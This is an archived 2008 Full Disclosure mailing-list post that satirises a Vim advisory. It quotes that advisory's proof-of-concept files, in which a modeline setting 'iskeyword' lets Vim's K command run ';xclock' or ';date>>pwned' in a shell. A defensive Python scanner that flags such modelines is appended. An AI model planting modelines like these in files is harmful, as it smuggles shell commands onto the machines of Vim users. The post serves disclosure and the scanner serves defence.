Full Disclosure mailing list archives
Arbitrary Command Execution in Windows and Unix Shells.
From: Bob Beck <beck () ualberta ca>
Date: Fri, 22 Aug 2008 10:43:01 -0600
Stupidity + Copy and Paste Considered Harmful
4. EXPLOIT

Copy-and-paste these examples into separate files:

;xclock
vim: set iskeyword=;,@

Place your cursor on ``xclock'', and press K. xclock appears.

;date>>pwned
vim: set iskeyword=1-255

Place your cursor on ``date'' and press K. File ``pwned'' is created in the current working directory.

Please note: If modeline processing is disabled, set the 'iskeyword' option manually.

See the thread on the Vim Developers' mailing list for some other examples[2].
(yes indeed, vim doesn't completely sanitize its input)

EXPLOIT:

echo '1 b3 1ee7' >> pwned

Copy and paste the above line into a unix shell or windows cmd window. File pwned is created.

Note, if the windowing system is not started, type the above command in manually.

IMPACT: I can create this file and mail it to ANYONE! ZOMG! Someone get me Kaminsky's slide templates so I can get the PR machine going for this discovery.

And I thought XSS stuff was lame. Sheesh.

--
#!/usr/bin/perl
if ((not 0 && not 1) != (! 0 && ! 1)) {
print "Larry and Tom must smoke some really primo stuff...\n";
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
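A defensive check for the modelines quoted in the message above, as an added example that is not part of the original post or of Vim: it flags files whose modeline sets 'iskeyword' so that shell metacharacters become part of the word under the cursor. The function names are hypothetical, the 'iskeyword' grammar is simplified, and every line is scanned rather than only the lines Vim would read as modelines.

```python
import re

# Characters that let a "keyword" carry a second shell command or a redirection.
SHELL_META = set(";|&<>`$()")

# Assumption: simplified modeline match ("vi:", "vim:" or "ex:" after whitespace).
MODELINE = re.compile(r"(?:^|\s)(?:vi|vim|ex):(.*)$")
ISK = re.compile(r"\b(?:iskeyword|isk)[+^-]?=([^\s:]+)")

def _code(tok):
    """One endpoint: a decimal character code or a literal character."""
    return int(tok) if tok.isdecimal() else ord(tok)

def iskeyword_chars(value):
    """Expand an 'iskeyword' value into the non-alphabetic characters it includes."""
    included, excluded = set(), set()
    for item in value.split(","):
        target = included
        if len(item) > 1 and item.startswith("^"):   # "^x" excludes x
            target, item = excluded, item[1:]
        if item in ("", "@"):                        # "@" = alphabetic, not relevant here
            continue
        m = re.fullmatch(r"(\d+|.)-(\d+|.)", item)   # range such as 1-255 or a-z
        if m:
            lo, hi = _code(m.group(1)), _code(m.group(2))
        elif item.isdecimal() or len(item) == 1:
            lo = hi = _code(item)
        else:
            continue                                 # form this sketch does not parse
        target.update(chr(c) for c in range(lo, min(hi, 255) + 1))
    return included - excluded

def scan(text):
    """Return (line_number, metacharacters) for each risky modeline in text."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        ml = MODELINE.search(line)
        isk = ISK.search(ml.group(1)) if ml else None
        risky = iskeyword_chars(isk.group(1)) & SHELL_META if isk else set()
        if risky:
            findings.append((n, "".join(sorted(risky))))
    return findings

# The two files from the quoted advisory, plus a constructed benign modeline.
SAMPLE_A = ";xclock\nvim: set iskeyword=;,@\n"
SAMPLE_B = ";date>>pwned\nvim: set iskeyword=1-255\n"
SAMPLE_C = "/* vim: set ts=4 iskeyword=@,48-57,_,192-255: */\n"

if __name__ == "__main__":
    for name, sample in (("A", SAMPLE_A), ("B", SAMPLE_B), ("C", SAMPLE_C)):
        print(name, scan(sample))
```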
Current thread:
- Vim: Arbitrary Code Execution in Commands: K, Control-], g] Jan Minář (Aug 22)
- Re: Vim: Arbitrary Code Execution in Commands: K, Control-], g] staff (Aug 22)
- Arbitrary Command Execution in Windows and Unix Shells. Bob Beck (Aug 22)
- Re: Arbitrary Code Execution in Commands: K, Control-], g] Michael Wojcik (Aug 26)